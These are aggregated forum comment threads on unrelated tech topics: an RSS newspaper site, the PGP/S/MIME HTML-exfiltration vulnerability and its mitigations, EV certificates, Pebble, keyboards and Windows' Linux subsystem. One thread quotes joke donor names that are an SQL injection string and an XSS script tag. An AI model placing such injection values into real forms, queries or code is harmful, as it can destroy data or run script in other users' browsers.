1. 12

    great idea and execution! especially for the mono toned images! I love it.

    however, maybe you should disable the scroll effect on article content and make the page background more paper-like :D

    Do you plan to open source it?

    1. 6

      thanks! the scroll effect is one of the tools i use to hide a lot of the sins of not being very good at laying out the articles. I’d like to disable it if i can but i think first i need to solve the problems mentioned here https://lobste.rs/s/ureotv/webpage_serverside_rendered_lo_fi_rss#c_3topbx, or truncate the articles to their box size in javascript, not sure which yet. If i truncate i’ll either have a modal view to the whole article, or just link directly to the source.

      as far as open sourcing it, yeah i think i will. depending on how much people like this i’ll probably add in the ability to choose your own feeds, categories, and layouts and might have a hosted version people could pay for, or an open source one you can host yourself.

      1. 4

        That’s great to hear, would love to see the source, set something like this up for myself. It looks great!

        1. 1

          Maybe use the column layout like iht.com used years ago.

          http://www.smokinggun.com/code/sg_layout.php

          1. 1

            great! keep up the good work. i’m looking forward for a hosted version, i’ll definitely pay for it!

            1. 1

              Very cool!

              I wonder if CSS grid can help with the layout. It seems like you would want to place articles into columns left-to-right like this: https://jsfiddle.net/4w8ysrqo/1/

              The part I can’t figure out is how to automatically set the height in grid cells based on the height in pixels.

          1. 1

            Does anyone have a list of the benefits/drawbacks they are referring to? Is there any discussion I can refer to?

            1. 7

              today’s date is the primary reference

              1. 1

                oh, hahaha I feel dumb now

              2. 1

                Check the date…

                1. 7

                  So as far as I see, this isn’t necessarily a bug with PGP “itself”, when used for signing git commits or used in combination with pass, but rather when sending encrypted emails. Or am I wrong?

                  1. 2

                    The first exploit, is definitely not PGP’s fault.

                    Unfortunately because I don’t know S/MIME, I can’t comment. But it seems like there is some inherent problem with the second attack affecting both it and PGP.

                    1. 2

                      CBC and CFB encryption modes use the previous blocks when encrypting new blocks. There are some weaknesses, and of course OpenPGP and S/MIME use them. That seems to be part of the problem. The other part is that stitching together multipart messages is something that email clients have no problem with doing, so shit HTML, can result in a query string that exfiltrates the content of the decrypted parts.

                      1. 2

                        OpenPGP mitigates those weaknesses with authenticated encryption (MDC). So it’s still only a problem if a broken MUA ignores decryption errors from gpg (or if the email in question is using a very old cipher. so, the attack may work if you auto-load remote content on encrypted emails from before 2000)

                        1. 1

                          OpenPGP mitigates those weaknesses with authenticated encryption (MDC). So it’s still only a problem if a broken MUA ignores decryption errors from gpg (or if the email in question is using a very old cipher. so, the attack may work if you auto-load remote content on encrypted emails from before 2000)

                  1. 3

                    A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. […]

                    The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

                    Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

                    Answer to some obvious questions are provided by one of researchers at this twitter thread

                    1. 12

                      They figured out mail clients which don’t properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S/MIME has no deployed mitigation.

                      From GNU Privacy Guard on Twitter

                      Due to broken MIME parsers a bunch of MUAs seem to concatenate decrypted HTML mime parts which makes it easy to plant such HTML snippets.

                      There are two ways to mitigate this attack

                      • Don’t use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links.

                      • Use authenticated encryption.

                      From Werner Koch

                      1. 4

                        Also: Don’t make mistakes. That’s important.

                        1. 4

                          HTML e-mail and PGP always seemed mutually exclusive to me :-)

                          1. 2

                            Don’t use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links.

                            Appreciate the highlights. My friends and I just GPG-encrypt text or zip files that we mail to each other to avoid problems in email clients. Looks like we’ll be fine. :)

                        1. 3

                          “Therefore, we propose to remove [EV] indicators, effective immediately,”

                          Dutch bank https://www.ing.nl using a Symantec cert allready lost the EV mark in google chrome while chromium/firefox display the EV mark.

                          1. 3

                            Seems they switched to a new CA already today (Entrust).

                          1. 7

                            I’m curious about the “various factors” - maybe the super tiny margins in the hardware market?

                            1. 4

                              “C. River Ventures killed Pebble but made a decent return: a $40m return on its $15m investment”

                              http://www.theregister.co.uk/2016/12/08/the_vulture_capitalists_killed_pebble/?page=2

                              1. 1

                                That’s really fantastic news. As sad as I am to see the company go away, the folks who created Pebble took a HUGE risk. They deserve a nice payout.

                            1. 7

                              I’m just in the process of switching to the ErgoDox EZ. One week in, and after a sweary first few days, I’m mostly typing without thinking about typing again. Very happy with the keyboard so far. Looking forward to customising the layout.

                              This switch makes my history of ergonomic keyboards:

                              1. 2

                                I’m still on the microsoft keyboard line and very happy with the Sculpt Ergonomic. The compact design is a big improvement over the Ergo Keyboard 4000. Pricing of the Microsoft line of keyboards is roughly a third opposed to the ErgoDox EZ, but price may not be your first priority.

                                1. 2

                                  The upgrade was very much a treat. I was on the 4000 for 5 years (though I had 2 in that time due to wear), and the Sculpt for a bit over 2. I had a £100 gift to put towards something, and thought I’d treat myself.

                                  Aside from the lack of mechanical keys the Microsoft keyboards are awesome!

                                2. 2

                                  Hah, my order actually looks similar, except switch the ErgoDox EZ with the Sculpt. I went from the 4000 to ErgoDox EZ, but realized the ErgoDox is much too large for my hands, and I really wasn’t having a remotely good experience typing on it. So back to the Sculpt I go.

                                1. 2

                                  This reminds me of an old (and basically defunct) project called coLinux (specifically, it’s andLinux variant). I really liked it when it was around, left me with a nice system for games, and all the linux I needed for programming. Good to see something like it coming around again.

                                  1. 1

                                    Apple had to do something similar to port OS9 applications to OSX (both having a completely different architecture and, I think, binary format).

                                    1. 1

                                      It reminds me of MachTen, of which I was an enthusiastic proponent, back when MacOS didn’t mean NextStep.

                                      1. 1

                                        MachTen

                                        I remember MachTen! I really wanted to try it out, but could never convince my dad to pony up for it…

                                        Instead, when I went off to college, he let me take an old Sun 3/60 with me (along with my mac), which was at the time simultaneously cooler and less useful than MachTen would’ve been.

                                        Did you use MachTen for work?

                                        1. 1

                                          Did you use MachTen for work?

                                          Yeah, although more for Emacs and telnet (!) than anything else. On my big old Powermac 8600.

                                      2. 1

                                        The three options I see are 1. Enhanced Cygwin-like API (it’s still win32, and as such, needs recompile) 2. Linux subsystem for NT (should be transparent - FreeBSD takes this approach) 3. Invisible Ubuntu VM running inside of Hyper-V (apparently discounted)

                                        1. 7

                                          http://blog.dustinkirkland.com/2016/03/ubuntu-on-windows.html has some more insights, confirming zaphar’s reply

                                          1. 5

                                            It’s essentially Wine in reverse. All the linux syscalls have been ported and native ubuntu apps run unmodified. So it’s pretty much 2.

                                            1. 8

                                              Can’t wait for someone to install Wine on Ubuntu on Windows 10, and then Cygwin on Wine. And since it seems possible to do this the other way round, we could finally run Cygwin on Wine on Cygwin on Wine on Ubuntu on Windows. (Bonus point for doing this on Windows on a Mac.)

                                              1. 3

                                                It’s essentially Wine in reverse.

                                                This makes it sound hacky ;). Windows NT has/had support for multiple what they call ‘personalities’. As far as I understand, from the perspective of the NT kernel Win32 is just another personality. There used to be OS/2 and POSIX personalities as well.

                                                https://www.microsoft.com/resources/documentation/windowsnt/4/workstation/reskit/en-us/os2comp.mspx?mfr=true https://www.youtube.com/watch?v=C0oWo9kV9K4

                                                I guess that the new Linux support is implemented as an NT personality.

                                                Does anyone know how they handle fork()? One of the problems for Cygwin was that fork() couldn’t be neatly mapped to a Win32 call, so they basically had to implement non-COW fork(), which is less efficient:

                                                https://www.cygwin.com/faq.html#faq.api.fork

                                                1. 6

                                                  NT itself has had a native COW fork() implementation going back a long time, but it’s not exposed via the Win32 API. You can reach it directly via the Native API NtCreateProcess function (exposed in ntdll.dll) with the right parameters. The problem here though is by going through the Native API there’s a large chunk of process initialisation that is implemented in Win32 that won’t be performed. As I understand it, this makes any such process created by such a method effectively “incompatible” with other Win32 processes on the system. You can find some interesting discussion on this here.

                                                  So to circle back to your question, if they’re implementing it via a separate environment subsystem, which it appears they are, they can presumably just use the native NT fork() support, but then there’s a greater question of compatibility with Win32 processes and how NT “Linux” processes can communicate with Win32 processes (and vice versa). Alternatively, I guess they could expose the fork() call via Win32, but this would imply they’re using Win32 processes as well…

                                                  I really need to load up the Windows 10 preview with this so I can actually get some concrete answers!

                                                  EDIT: One interesting addendum is that per this Ars Technica article there’s definitely several new kernel components involved, in the form of at least two drivers: lxcore.sys and lxss.sys. So there’s clearly more going on than just a separate Linux environment that’s implemented on top of the existing Native API exposed in ntdll.dll. What exactly those provide I’m not sure, but it’s worth noting as best I can remember Interix/SFU/SUA never required any kernel support as they just implemented a separate subsystem on top of what was already exposed in the Native API.

                                                  1. 2

                                                    If they want to handle Linux system calls in unmodified binaries, there will definitely have to be at least a small kernel component. Linux binaries make use of the syscall instruction on amd64 and the int 0x80 instruction on i386. If nothing else, they will need to trap those instructions separately from whatever regular Windows processes are doing.

                                                    1. 1

                                                      ss stands for “subsystem” in NT component names (e.g. lsass.exe for the Local Security Authority, or csrss.exe for the Client Server Runtime, aka Win32 subsystem support) so lxss.sys would not be an unexpected name for the Linux subsystem kernel component.

                                            1. 6

                                              More interesting contributors:

                                              “Mihai'); DROP TABLE Donors;– ”

                                              little bobby tables shows up everywhere

                                              1. 3

                                                █▄▄ ███ █▄▄ █▄█▄█ █▄█ ▀█▀

                                                (づ。◕‿‿◕。)づ ☜(゚ヮ゚☜) ლ(.◉◞౪◟◉‵ლ) ヽ༼ຈل͜ຈ༽ノ [̲̅.̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅.̲̅] Ƹ̵̡Ӝ̵̨̄Ʒ

                                                <script type=‘text/javascript’>alert(“cczub gave you money and checked for XSS for free”);</script>

                                                humanity never ceases to amaze me

                                            1. 2

                                              what happened to OpenCVS?

                                              1. 5

                                                The interested developers left and the left developers aren’t interested, basically. I think it got really close, but it’s not fully compatible and achieving that last bit requires a rather massive overhaul. As in, there may not be a way to finish it with a series of only small patches.

                                              1. 4

                                                So just to be sure I understand what a “planet” is - it’s a blogroll/aggregate feed of the project’s members and participants?

                                                1. 3

                                                  From http://www.planetplanet.org/

                                                  Planet is an awesome ‘river of news’ feed reader. It downloads news feeds published by web sites and aggregates their content together into a single combined feed, latest news first.

                                                  Your understanding is correct

                                                1. 1

                                                  A fresh start - full disclosure returns http://seclists.org/fulldisclosure/2014/Mar/333

                                                  1. 1

                                                    If exploited, this vulnerability might permit code execution with the privileges of the authenticated user

                                                    phew

                                                    1. 2

                                                      .. and may therefore allow bypassing restricted shell/command